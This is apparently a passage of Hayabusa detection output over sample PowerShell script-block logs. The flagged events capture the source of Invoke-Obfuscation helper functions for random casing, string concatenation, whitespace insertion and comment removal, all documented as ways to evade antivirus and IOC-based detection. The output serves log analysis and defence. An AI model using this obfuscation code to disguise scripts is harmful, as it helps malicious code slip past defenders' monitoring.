Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. 
Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. 
.EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. 
# If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. 
Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. 
$InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. 
.EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. 
Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. 
Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. 
$LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. 
.EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. 
Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . 
